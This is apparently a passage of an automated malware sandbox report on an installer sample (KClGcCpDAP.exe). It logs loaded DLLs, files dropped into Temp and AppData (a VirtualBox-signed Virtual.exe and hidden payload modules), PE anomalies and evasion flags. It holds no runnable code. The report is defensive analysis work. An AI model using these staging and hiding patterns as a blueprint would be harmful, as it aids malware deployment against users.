                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: devrtl.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxddu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: vboxrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: newdev.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: msvcp100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: devrtl.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
                  Source: xdhqslqcnobw.4.drLNK file: ..\..\Roaming\TlsCloud_WRv3_x64\Virtual.exe
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                  Source: KClGcCpDAP.exeStatic file information: File size 8656211 > 1048576
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile opened: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dllJump to behavior
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: KClGcCpDAP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: KClGcCpDAP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: msvcp100.amd64.pdb source: Virtual.exe, 00000002.00000003.1711778991.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724662734.00000000665EF000.00000002.00000001.01000000.0000000C.sdmp, Virtual.exe, 00000003.00000002.1780293522.000000006646F000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxDDU\VBoxDDU.pdb source: Virtual.exe, 00000002.00000002.1726253927.00007FFE0E175000.00000002.00000001.01000000.00000009.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1781691145.00007FFE01345000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: msvcr100.amd64.pdb source: Virtual.exe, 00000002.00000003.1712097641.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724966337.00000000666D1000.00000002.00000001.01000000.0000000A.sdmp, Virtual.exe, 00000003.00000002.1780499574.0000000066551000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxSVC\VBoxSVC.pdb source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: ntdll.pdb source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower_Ln
                  Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxRT\VBoxRT.pdb source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: wntdll.pdb source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: KClGcCpDAP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: KClGcCpDAP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: KClGcCpDAP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: KClGcCpDAP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: KClGcCpDAP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E231400 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_6E231400
                  Source: jamulieilmfjkk.4.drStatic PE information: real checksum: 0x260d5c should be: 0x259261
                  Source: KClGcCpDAP.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x83c81b
                  Source: VBoxRT.dll.2.drStatic PE information: real checksum: 0x413417 should be: 0x40cba5
                  Source: VBoxRT.dll.1.drStatic PE information: real checksum: 0x413417 should be: 0x40cba5
                  Source: KClGcCpDAP.exeStatic PE information: real checksum: 0x0 should be: 0x84fd8f
                  Source: bewwwy.18.drStatic PE information: real checksum: 0x260d5c should be: 0x259261
                  Source: Ammonium.dll.1.drStatic PE information: real checksum: 0x45d32 should be: 0x4609e
                  Source: KClGcCpDAP.exeStatic PE information: section name: .wixburn
                  Source: KClGcCpDAP.exe.0.drStatic PE information: section name: .wixburn
                  Source: Ammonium.dll.1.drStatic PE information: section name: /4
                  Source: msvcr100.dll.1.drStatic PE information: section name: _CONST
                  Source: msvcr100.dll.1.drStatic PE information: section name: text
                  Source: msvcr100.dll.2.drStatic PE information: section name: _CONST
                  Source: msvcr100.dll.2.drStatic PE information: section name: text
                  Source: validPower_Lnz_x64.exe.4.drStatic PE information: section name: Shared
                  Source: jamulieilmfjkk.4.drStatic PE information: section name: .xdata
                  Source: jamulieilmfjkk.4.drStatic PE information: section name: gfcdpo
                  Source: bewwwy.18.drStatic PE information: section name: .xdata
                  Source: bewwwy.18.drStatic PE information: section name: gfcdpo
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089EAD6 push ecx; ret 0_2_0089EAE9
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2EAD6 push ecx; ret 1_2_00D2EAE9
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665B29CA push rcx; ret 2_2_665B29CB
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxRT.dllJump to dropped file
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxDDU.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcp100.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bewwwyJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\jamulieilmfjkkJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dllJump to dropped file
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dllJump to dropped file
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcp100.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxRT.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeJump to dropped file
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcr100.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxDDU.dllJump to dropped file
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcp100.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxRT.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeFile created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\jamulieilmfjkkJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bewwwyJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Found hidden mapped module (file has been removed from disk)
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JAMULIEILMFJKK
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BEWWWY
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665D73C GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetLastError,2_2_6665D73C

                  Malware Analysis System Evasion

                  barindex
